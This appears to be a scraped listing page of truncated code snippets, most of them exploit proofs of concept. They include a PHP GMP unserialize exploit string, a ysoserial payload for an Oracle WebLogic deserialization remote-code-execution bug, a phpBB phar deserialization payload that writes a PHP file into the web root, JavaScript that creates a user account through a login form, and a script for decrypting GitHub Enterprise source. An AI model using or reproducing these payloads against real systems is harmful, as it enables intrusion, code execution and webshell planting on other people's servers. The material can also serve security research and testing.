This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var login = 'testuser'; //логин пользователя | |
var password = 'SuperMEgaPa$$'; //пароль | |
var email = '[email protected]'; // email | |
/* Code */ | |
var b = BS.LoginForm; | |
var public_key = $F("publicKey"); | |
var encrypted_pass = BS.Encrypt.encryptData(password, $F("publicKey")); | |
var parameters = 'username1='+login+'&email='+encodeURIComponent(email)+'&submitCreateUser=&publicKey='+public_key+'&encryptedPassword1='+encrypted_pass+'&encryptedRetypedPassword='+encrypted_pass; | |
var c = OO.extend(BS.ErrorsAwareListener, { | |
onDuplicateAccountError: function(b) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
display_usage() { | |
echo "This script check connection to list of URLs with specified host." | |
echo -e "\nUsage:\n$0 ipsfile hostname\n" | |
echo -e "\nExample:\n$0 moz-com.list moz.com\n" | |
} | |
if [ $# -le 1 ] | |
then |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
class obj | |
{ | |
var $test; | |
function __wakeup() | |
{ | |
$this->test = 1; | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$a = new stdClass; // handle = 1 | |
$a->test = false; | |
echo('Property $a->test is: '); | |
var_dump($a->test); | |
$b = unserialize('a:1:{i:0;C:3:"GMP":69:{s:1:"1";a:2:{s:4:"test";b:1;i:0;O:12:"DateInterval":1:{s:1:"y";R:2;}}}}'); | |
echo('Property $a->test changed to: '); | |
var_dump($a->test); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/ruby | |
# | |
# This tool is only used to "decrypt" the github enterprise source code. | |
# | |
# Run in the /data directory of the instance. | |
require "zlib" | |
KEY = "This obfuscation is intended to discourage GitHub Enterprise customers "+ | |
"from making modifications to the VM. We know this 'encryption' is easily broken. " |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
070: $scripts->add( 'utils', "/wp-includes/js/utils$suffix.js" ); | |
... | |
078: $scripts->add( 'common', "/wp-admin/js/common$suffix.js", array('jquery', 'hoverIntent', 'utils'), false, 1 ); | |
... | |
086: $scripts->add( 'wp-a11y', "/wp-includes/js/wp-a11y$suffix.js", array( 'jquery' ), false, 1 ); | |
... | |
088: $scripts->add( 'sack', "/wp-includes/js/tw-sack$suffix.js", array(), '1.6.1', 1 ); | |
... | |
090: $scripts->add( 'quicktags', "/wp-includes/js/quicktags$suffix.js", array(), false, 1 ); | |
... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team | |
// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/ | |
package ysoserial.payloads; | |
import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub; | |
import sun.rmi.server.UnicastRef; | |
import sun.rmi.transport.LiveRef; | |
import sun.rmi.transport.tcp.TCPEndpoint; | |
import ysoserial.payloads.annotation.Authors; | |
import ysoserial.payloads.annotation.PayloadTest; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// All greets goes to RIPS Tech | |
// Run this JS on Attachment Settings ACP page | |
var plupload_salt = ''; | |
var form_token = ''; | |
var creation_time = ''; | |
var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip | |
// your payload here | |
var payload = '<?php __HALT_COMPILER(); ?>\x0d\x0a\xfe\x01\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01'+'\x00'.repeat(5)+'\xc8\x01\x00\x00O:31:"GuzzleHttp\x5cCookie\x5cFileCookieJar":4:{s:41:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00filename";s:30:"/var/www/html/phpBB3/pinfo.php";s:52:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00storeSessionCookies";b:1;s:36:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00cookies";a:1:{i:0;O:27:"GuzzleHttp\x5cCookie\x5cSetCookie":1:{s:33:"\x00GuzzleHttp\x5cCookie\x5cSetCookie\x00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:17:"<?php phpinfo();#";}}}s:39:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00strictMode";N;}\x08\x00\x00\x00test.txt\x04\x00\x00\x00 |
OlderNewer